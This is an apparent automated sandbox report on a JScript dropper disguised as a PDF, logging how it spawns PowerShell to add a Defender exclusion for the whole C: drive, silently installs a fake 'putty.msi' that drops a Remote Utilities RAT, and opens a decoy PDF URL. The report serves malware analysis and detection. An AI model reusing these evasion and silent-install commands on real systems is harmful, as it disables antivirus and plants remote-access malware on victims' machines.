          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2369369070.0000022F40513000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
          Source: unknown | HTTPS traffic detected: 150.171.27.254:443 -> 192.168.2.5:49690 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 217.21.85.207:443 -> 192.168.2.5:49691 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 217.21.85.207:443 -> 192.168.2.5:49692 version: TLS 1.2
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A1D627669EFC8CD4F21BCF387D97F9B5_E818918BC57803438E0E0146A88425A7
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BD92F95DED26541D3AF7F44DC7914843
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4A62E94087F64223B9812F11186592BA
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9CB4373A4252DE8D2212929836304EC5_6C354C532D063DF5607A63BA827F5164
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0766DB9AB186806BB9A6B6802D3BA734
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B039FEA45CB4CC4BBACFC013C7C55604_50385F8EB1F713E33924A830D7A2A41C

          System Summary

          Source: 39.0.rfusclient.exe.bb0000.0.unpack, type: UNPACKEDPE | Matched rule: RemoteUtilitiesRAT RAT payload Author: ditekSHen
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe, type: DROPPED | Matched rule: RemoteUtilitiesRAT RAT payload Author: ditekSHen
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe, type: DROPPED | Matched rule: RemoteUtilitiesRAT RAT payload Author: ditekSHen
          Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
          Source: C:\Windows\System32\wscript.exe | COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\putty.msi" /qn
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\putty.msi" /qn
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\scoped_dir4952_351580900
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\4b3d1b.msi
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI44FB.tmp
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\SourceHash{65007958-166B-4F52-87F6-0C61CE20EB5C}
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\inprogressinstallinfo.ipi
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI46B1.tmp
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\4b3d1e.msi
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\4b3d1e.msi
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\ARPPRODUCTICON.exe
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exe
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exe
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exe
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_start_C00864331B9D4391A8A26292A601EBE2.exe
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0766DB9AB186806BB9A6B6802D3BA734
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0766DB9AB186806BB9A6B6802D3BA734
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4A62E94087F64223B9812F11186592BA
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4A62E94087F64223B9812F11186592BA
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A1D627669EFC8CD4F21BCF387D97F9B5_E818918BC57803438E0E0146A88425A7
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A1D627669EFC8CD4F21BCF387D97F9B5_E818918BC57803438E0E0146A88425A7
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B039FEA45CB4CC4BBACFC013C7C55604_50385F8EB1F713E33924A830D7A2A41C
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BD92F95DED26541D3AF7F44DC7914843
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BD92F95DED26541D3AF7F44DC7914843
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B039FEA45CB4CC4BBACFC013C7C55604_50385F8EB1F713E33924A830D7A2A41C
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9CB4373A4252DE8D2212929836304EC5_6C354C532D063DF5607A63BA827F5164
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9CB4373A4252DE8D2212929836304EC5_6C354C532D063DF5607A63BA827F5164
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File deleted: C:\Windows\SystemTemp\scoped_dir4952_351580900
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 39_2_6B35CBD0
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 39_2_6B35D620
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 39_2_6B41E260
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 39_2_6B35DC00
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 39_2_6B365800
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 39_2_6B36A250
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 39_2_6B368090
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 39_2_6B3F7080
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 39_2_6B365AE0
          Source: U0443.pdf.js | Initial sample: Strings found which are bigger than 50
          Source: unires_vpd.dll.34.dr | Static PE information: Resource name: None type: COM executable for DOS
          Source: rutserv.exe.34.dr | Static PE information: Resource name: RT_RCDATA type: Zip archive data, at least v2.0 to extract, compression method=deflate
          Source: rfusclient.exe.34.dr | Static PE information: Resource name: RT_STRING type: PDP-11 separate I&D executable not stripped
          Source: rfusclient.exe.34.dr | Static PE information: Resource name: RT_RCDATA type: Zip archive data, at least v2.0 to extract, compression method=deflate
          Source: unidrvui_rppd.dll0.34.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: unires_vpd.dll0.34.dr | Static PE information: Resource name: None type: COM executable for DOS
          Source: libcodec32.dll.34.dr | Static PE information: Number of sections : 20 > 10
          Source: rfusclient.exe.34.dr | Static PE information: Number of sections : 11 > 10
          Source: rutserv.exe.34.dr | Static PE information: Number of sections : 11 > 10
          Source: libasset32.dll.34.dr | Static PE information: Number of sections : 19 > 10
          Source: unires_vpd.dll0.34.dr | Static PE information: No import functions for PE file found
          Source: unires_vpd.dll.34.dr | Static PE information: No import functions for PE file found
          Source: 39.0.rfusclient.exe.bb0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RemoteUtilitiesRAT author = ditekSHen, description = RemoteUtilitiesRAT RAT payload, clamav_sig = MALWARE.Win.Trojan.RemoteUtilitiesRAT
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe, type: DROPPED | Matched rule: MALWARE_Win_RemoteUtilitiesRAT author = ditekSHen, description = RemoteUtilitiesRAT RAT payload, clamav_sig = MALWARE.Win.Trojan.RemoteUtilitiesRAT
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe, type: DROPPED | Matched rule: MALWARE_Win_RemoteUtilitiesRAT author = ditekSHen, description = RemoteUtilitiesRAT RAT payload, clamav_sig = MALWARE.Win.Trojan.RemoteUtilitiesRAT
          Source: unires_vpd.dll0.34.dr | Static PE information: Section .rsrc
          Source: unires_vpd.dll.34.dr | Static PE information: Section .rsrc
          Source: classification engine | Classification label: mal100.troj.expl.evad.winJS@89/121@8/6
          Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host
          Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\putty.msi
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\RManFUSTray
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4588:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3832:120:WilError_03
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$1fc
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2280:120:WilError_03
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\RManFUSLocal
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$510
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Mutant created: \BaseNamedObjects\HookTThread$520
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3564:120:WilError_03
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Mutant created: \BaseNamedObjects\madExceptSettingsMtx$520
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$19b4
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Mutant created: \BaseNamedObjects\madExceptSettingsMtx$1680
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4960:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gpjzntt2.0pw.ps1
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: U0443.pdf.js | Virustotal: Detection: 9%
          Source: rfusclient.exe | String found in binary or memory: MODULESDIR: "E:/dev/vcpkg/installed/x86-mingw-static/lib/ossl-modules"
          Source: rfusclient.exe | String found in binary or memory: ENGINESDIR: "E:/dev/vcpkg/installed/x86-mingw-static/lib/engines-3"
          Source: rfusclient.exe | String found in binary or memory: E:/dev/vcpkg/installed/x86-mingw-static/lib/ossl-modules
          Source: rfusclient.exe | String found in binary or memory: E:/dev/vcpkg/installed/x86-mingw-static/lib/engines-3
          Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U0443.pdf.js"
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,8986519759331592516,17312955933215486505,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1828 /prefetch:3
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,8986519759331592516,17312955933215486505,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3092 /prefetch:8
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\putty.msi" /qn
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\putty.msi" /qn
          Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
          Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 85876F97EED0B7EDCFF1192CE7DC76A0
          Source: C:\Windows\System32\msiexec.exe | Process created: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" -msi_copy "C:\Users\user\AppData\Roaming\putty.msi"
          Source: C:\Windows\System32\msiexec.exe | Process created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall
          Source: C:\Windows\System32\msiexec.exe | Process created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" -firewall
          Source: C:\Windows\System32\msiexec.exe | Process created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /start
          Source: unknown | Process created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" -service
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Process created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" -firewall
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Process created: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe"
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Process created: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Process created: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\putty.msi" /qn
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22
